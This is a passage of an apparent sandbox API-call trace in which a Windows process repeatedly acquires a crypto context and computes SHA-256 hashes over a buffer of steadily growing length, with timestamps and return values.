(hProv=0x338235d0, dwFlags=0x0) returned 1 [0151.250] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0151.250] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.250] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0151.250] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60f20 [0151.250] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.250] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0151.250] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821fd0) returned 1 [0151.251] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.251] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0151.251] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e615b0 [0151.251] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.251] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0151.251] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338236d0) returned 1 [0151.251] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.252] CryptHashData (hHash=0x332b77b0, pbData=0x32e5fa80, dwDataLen=0x300, dwFlags=0x0) returned 1 [0151.252] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60b60 [0151.252] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0151.252] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0151.252] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0151.252] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.252] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x320, dwFlags=0x0) returned 1 [0151.252] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e610d0 [0151.252] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.252] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0151.253] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0151.253] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.253] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x340, dwFlags=0x0) returned 1 [0151.253] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61130 [0151.253] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.253] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0151.253] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338228d0) returned 1 [0151.254] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.254] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x360, dwFlags=0x0) returned 1 [0151.254] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60bf0 [0151.254] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.254] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0151.254] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338220d0) returned 1 [0151.254] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.254] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x380, dwFlags=0x0) returned 1 [0151.254] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61250 [0151.255] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.255] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0151.255] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0151.255] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.255] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0151.255] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e612b0 [0151.255] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.255] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0151.255] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821fd0) returned 1 [0151.256] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.256] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0151.256] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61340 [0151.256] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.256] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0151.256] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338227d0) returned 1 [0151.256] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.256] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0151.257] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61610 [0151.257] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.257] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0151.257] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338231d0) returned 1 [0151.257] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.257] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x400, dwFlags=0x0) returned 1 [0151.257] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61370 [0151.257] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0151.257] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0151.257] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338232d0) returned 1 [0151.258] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.258] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x420, dwFlags=0x0) returned 1 [0151.258] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60c20 [0151.258] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.258] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0151.258] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0151.259] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.259] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x440, dwFlags=0x0) returned 1 [0151.259] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e613a0 [0151.259] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.259] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0151.259] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338223d0) returned 1 [0151.259] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.259] CryptHashData (hHash=0x332b7900, pbData=0x32e5fa80, dwDataLen=0x460, dwFlags=0x0) returned 1 [0151.259] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60c50 [0151.259] CryptDestroyHash (hHash=0x332b7900) returned 1 [0151.259] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0151.259] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0151.260] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.260] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x480, dwFlags=0x0) returned 1 [0151.260] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60ce0 [0151.260] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.260] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0151.260] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822bd0) returned 1 [0151.260] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.260] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0151.261] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e613d0 [0151.261] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.261] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0151.261] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0151.261] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.261] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0151.261] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61400 [0151.261] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.261] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0151.261] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822bd0) returned 1 [0151.262] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.262] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0151.262] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60c80 [0151.262] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.262] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0151.262] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0151.263] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.263] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x500, dwFlags=0x0) returned 1 [0151.263] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61430 [0151.263] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.263] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0151.263] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338239d0) returned 1 [0151.264] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.264] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x520, dwFlags=0x0) returned 1 [0151.264] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61460 [0151.264] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.264] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0151.264] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338232d0) returned 1 [0151.265] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.265] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x540, dwFlags=0x0) returned 1 [0151.265] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60d10 [0151.265] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.265] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0151.265] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822cd0) returned 1 [0151.265] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.265] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x560, dwFlags=0x0) returned 1 [0151.265] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e614c0 [0151.266] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.266] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0151.266] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338236d0) returned 1 [0151.266] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.266] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x580, dwFlags=0x0) returned 1 [0151.266] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e614f0 [0151.266] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.266] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0151.266] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0151.267] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.267] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0151.267] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61520 [0151.267] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.267] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0151.267] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0151.267] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.268] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0151.268] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60d40 [0151.268] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.268] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0151.268] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0151.268] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.268] CryptHashData (hHash=0x332b7970, pbData=0x32e5fa80, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0151.268] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61550 [0151.268] CryptDestroyHash (hHash=0x332b7970) returned 1 [0151.268] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0151.268] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338229d0) returned 1 [0151.269] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.269] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x600, dwFlags=0x0) returned 1 [0151.269] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60d70 [0151.269] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.269] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0151.269] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0151.270] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.270] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x620, dwFlags=0x0) returned 1 [0151.270] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60dd0 [0151.270] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.270] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0151.270] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0151.270] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.270] CryptHashData (hHash=0x332b77b0, pbData=0x32e5fa80, dwDataLen=0x640, dwFlags=0x0) returned 1 [0151.270] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60e00 [0151.270] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0151.270] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0151.270] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0151.271] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.271] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x660, dwFlags=0x0) returned 1 [0151.271] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60e30 [0151.271] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0151.271] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0151.271] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0151.272] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.272] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x680, dwFlags=0x0) returned 1 [0151.272] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60e60 [0151.272] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.272] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0151.272] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338235d0) returned 1 [0151.272] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.272] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0151.272] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60e90 [0151.272] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.272] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0151.272] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0151.273] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.273] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0151.273] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e60ec0 [0151.273] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.273] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0151.273] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338229d0) returned 1 [0151.274] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.274] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0151.274] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61bb0 [0151.274] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.274] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0151.274] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822dd0) returned 1 [0151.274] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.274] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x700, dwFlags=0x0) returned 1 [0151.275] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61f40 [0151.275] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.275] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0151.275] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338235d0) returned 1 [0151.275] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.275] CryptHashData (hHash=0x332b7900, pbData=0x32e5fa80, dwDataLen=0x720, dwFlags=0x0) returned 1 [0151.275] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61b50 [0151.275] CryptDestroyHash (hHash=0x332b7900) returned 1 [0151.275] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0151.275] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823ad0) returned 1 [0151.276] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.276] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x740, dwFlags=0x0) returned 1 [0151.276] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61f70 [0151.276] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.276] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0151.276] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33823bd0) returned 1 [0151.276] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.277] CryptHashData (hHash=0x332b77b0, pbData=0x32e5fa80, dwDataLen=0x760, dwFlags=0x0) returned 1 [0151.277] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61d30 [0151.277] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0151.277] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0151.277] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338239d0) returned 1 [0151.277] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.277] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x780, dwFlags=0x0) returned 1 [0151.277] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e61b80 [0151.277] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.277] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0151.277] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338223d0) returned 1 [0151.278] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.278] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0151.278] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e618b0 [0151.278] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.278] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0151.278] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0151.279] CryptCreateHash 